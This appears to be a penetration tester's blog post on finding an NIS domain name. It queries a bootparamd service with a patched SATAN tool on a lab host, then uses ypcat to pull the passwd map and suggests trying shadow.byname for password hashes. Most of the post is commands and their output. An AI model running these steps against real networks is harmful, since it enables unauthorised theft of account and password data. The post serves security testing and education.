Finding the NIS Domain Name from Bootparamd
NIS (Network Information Service) is not a particularly common protocol on modern internal networks. This is for good reason really consider its security weaknesses. Its presense is often a gift to penetration testers (and probably hackers too). This blog entry briefly documents one way that all important NIS Domain Name can be found remotely.
SATAN includes a nice little tool called “boot” which can remotely query the bootparamd service – often found running on the NIS server. I tweaked this slightly so that it compiles under Linux (I’ve only tried it on Gentoo). Download my hacked up copy here.
First locate a host that is running both ypserv and bootparamd. This is invariably a Solaris host, but in this example it’s Debian:
$ rpcinfo -p 192.168.20.128 program vers proto port 100000 2 tcp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 749 status 100024 1 tcp 752 status 100004 2 udp 1017 ypserv 100004 1 udp 1017 ypserv 100004 2 tcp 1020 ypserv 100004 1 tcp 1020 ypserv 100009 1 udp 1020 yppasswdd 600100069 1 udp 1022 fypxfrd 600100069 1 tcp 600 fypxfrd 100007 2 udp 605 ypbind 100007 1 udp 605 ypbind 100007 2 tcp 608 ypbind 100007 1 tcp 608 ypbind 100026 1 udp 603 bootparam
Now compile and run the bootparam client then query the bootparamd service.
$ tar xfz satan-bootparamd-client-ptm-patch.tar.gz $ cd satan-bootparamd-client-ptm-patch $ ls -l total 12 -rw------- 1 ml ml 399 Jun 17 12:50 Makefile -rw------- 1 ml ml 2461 Jun 17 12:50 boot.c -rw------- 1 ml ml 3019 Jun 17 12:50 bootparam_prot.x $ make
You need to supply the “boot” progam a client and server IP address.
$ ./boot Usage: ./boot bootclient bootserver
In this example at least the server had to be set up specifically set up to serve a ficticious client (by editing /etc/bootparams). If you get a message like the following, try a different client IP address:
$ ./boot 192.168.20.99 192.168.20.128 me: cannot contact bootparam server at 192.168.20.128 for 192.168.20.99: RPC: Timed out
A successful response will look like this:
$ ./boot 192.168.20.3 192.168.20.128 client_name: someclient domain_name: mynisdom router_addr: 192.168.20.128
Once you have the NIS Domain Name, you can grab the passwd file as follows:
$ ypcat -h 192.168.20.128 -d mynisdom passwd.byname user:x:1000:1000:user,,,:/home/user:/bin/bash ptm:x:1001:100::/home/ptm:
If you’re really lucky it’ll contain the password hashes too (also try to grab shadow.byname if it doesn’t).
If you’re unable to extract the NIS domain name from bootparamd, you could try querying other available services (FTP, SMTP, NFS, etc.) in order to find the DNS Domain name or some host names. The NIS domain name could be similar to the DNS domain name, or to hostnames – but isn’t necessarily. YMMV.
Posted in Blog